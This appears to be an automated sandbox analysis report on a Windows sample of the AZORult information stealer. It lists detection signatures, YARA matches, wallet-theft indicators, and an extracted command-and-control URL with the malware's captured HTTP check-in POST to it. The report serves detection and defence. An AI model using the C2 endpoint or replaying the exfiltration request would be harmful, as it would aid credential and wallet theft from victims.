Play interactive tour

Edit tour

Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Sample Name:	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Analysis ID:	491841
MD5:	73bd76f0549cc1992d943ddfd92a9c4d
SHA1:	802e70b76c7c0860b3a4a257b1bc96fc3430ff01
SHA256:	2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
Tags:	AZORultexe
Infos:
Most interesting Screenshot:

Detection

AZORult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Azorult

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Detected AZORult Info Stealer

Yara detected Azorult Info Stealer

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Yara signature match

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

IP address seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe' MD5: 73BD76F0549CC1992D943DDFD92A9C4D)

cleanup

Malware Configuration

Threatname: Azorult

{"C2 url": "http://admin.svapofit.com/azs/index.php"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	Azorult_1	Azorult Payload	kevoreilly	0x16753:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	Azorult_1	Azorult Payload	kevoreilly	0x16753:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Avira: detected

Found malware configuration

Show sources

Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp

Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"}

Multi AV Scanner detection for submitted file

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Virustotal: Detection: 68%			Perma Link
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	ReversingLabs: Detection: 75%

Antivirus detection for URL or domain

Show sources

Source: http://ww1.survey-smiles.com/%	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/e	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/z	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/sof	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Show sources

Source: admin.svapofit.com	Virustotal: Detection: 9%	Perma Link
Source: survey-smiles.com	Virustotal: Detection: 7%	Perma Link
Source: ww1.survey-smiles.com	Virustotal: Detection: 8%	Perma Link

Machine Learning detection for sample

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_0040A610 CryptUnprotectData,LocalFree,

0_2_0040A610

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00413F58
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00413F58

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://admin.svapofit.com/azs/index.php

Source: global traffic	HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176

Source: Joe Sandbox View

ASN Name: NOCIXUS NOCIXUS

Source: Joe Sandbox View

IP Address: 199.59.242.153 199.59.242.153

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp	String found in binary or memory: http://admin.svapofit.com/azs/index.php
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.com/azs/index.php8
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: http://ip-api.com/json
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.c-k
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: http://survey-smiles.com
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.com/=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.com/csvc
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/e
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/sof
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/z
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: http://www.icq.com/legal/eula/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: http://www.icq.com/legal/privacypolicy/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: https://dotbit.me/a/

Source: unknown

HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=

Source: unknown

DNS traffic detected: queries for: admin.svapofit.com

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

0_2_00417D84

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 004034E4 appears 32 times

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Process Stats: CPU usage > 98%

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	ReversingLabs: Detection: 75%

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: More than 200 imports for KERNEL32.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041A068 push 0041A08Eh; ret	0_2_0041A086
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041A02C push 0041A05Ch; ret	0_2_0041A054
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E8D0 push 0040E905h; ret	0_2_0040E8FD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B164 push 0040B190h; ret	0_2_0040B188
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E908 push 0040E94Ah; ret	0_2_0040E942
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B12C push 0040B158h; ret	0_2_0040B150
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C136 push 0040C164h; ret	0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C138 push 0040C164h; ret	0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040813C push 00408174h; ret	0_2_0040816C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004171E8 push 00417214h; ret	0_2_0041720C
